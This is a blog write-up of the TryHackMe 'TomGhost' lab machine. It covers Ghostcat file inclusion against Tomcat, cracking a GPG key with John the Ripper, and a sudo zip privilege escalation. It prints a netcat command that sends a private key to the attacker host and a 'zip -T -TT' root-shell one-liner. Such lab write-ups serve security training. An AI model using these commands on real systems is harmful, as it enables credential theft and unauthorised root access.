CTF Walkthroughs, TryHackMe

TryHackMe – TomGhost Walkthrough

August 2, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Linux machine that involved exploiting the Ghostcat vulnerability affecting Apache Tomcat to gain initial access, cracking the hash of a GPG private key and exploiting the Zip binary with Sudo permissions enabled to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified a few open ports: 22 (SSH), 53 (DNS), 8009 (Apache JServ) and 8080 (HTTP using Apache Tomcat). The next step will be to start enumerating HTTP.

Enumerating HTTP

When navigating to the site on port 8080, it takes to the Tomcat home page and it appears to be version 9.0.30:

When consulting HackTricks on the Apache JServ Pentesting section, it mentions a known vulnerability called Ghostcat, a local file inclusion that can allow attackers to obtain the contents of local files on the servers, although it is somewhat limited:

Apache JServ is a binary version of the HTTP protocol and it is primarily used when clustering or reverse proxies is required, as it is optimized for these specific scenarios. This issue can only occur if the AJP Connector (running on port 8009) is exposed externally, which is not a recommended configuration as there is no need for this to be publicly accessible.

Exploiting Ghostcat

Cloning the exploit mentioned in HackTricks:

Upon running the exploit, this gives the ability to read the web.xml file, which contains user credentials:

As it turns out, skyfuck is an actual user on the machine, so SSH can be used to authenticate to it:

The first flag can be found in the home directory of the merlin user:

Privilege Escalation

A “tryhackme.asc” file can be found in the current user’s home directory, and by the looks of it, it appears to be a PGP private key:

As it turns out, it requires a password to decrypt the credential.pgp file:

Transferring the key to the kali host using Netcat:

#on the remote host
nc 10.4.36.186 443 < tryhackme.asc
#on the local host
sudo nc -lvnp 443 > tryhackme.asc

Extracting the hash from the key using the GPG2John tool:

Using John the Ripper with the following flags to crack the previously found hashes:

  • –wordlist to specify the wordlist to be used, in this case, rockyou
  • the text file containing the hashes, one per line

Importing the key and using it to decrypt the credentials:

gpg --import tryhackme.asc
gpg --decrypt credential.ahp

The password for the merlin user was found. Changing user:

When running sudo -l, it appears that the merlin user can execute the Zip binary as root:

Upon consulting GTFOBins, it appears this can easily be exploited to escalate privileges

According to the Zip man page, the -T flag is used to test the integrity of the archive file being created, and the -TT command can be used in combination with it to execute a command against the archive:

This effectively provides arbitrary command execution. Running the commands mentioned above:

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'

This has granted root-level access to the machine.

Conclusion

This was a very interesting box, the exploitation process was quite unique and definitely a new vulnerability to me, the privilege escalation part was also quite nice as it involved cracking GPG keys.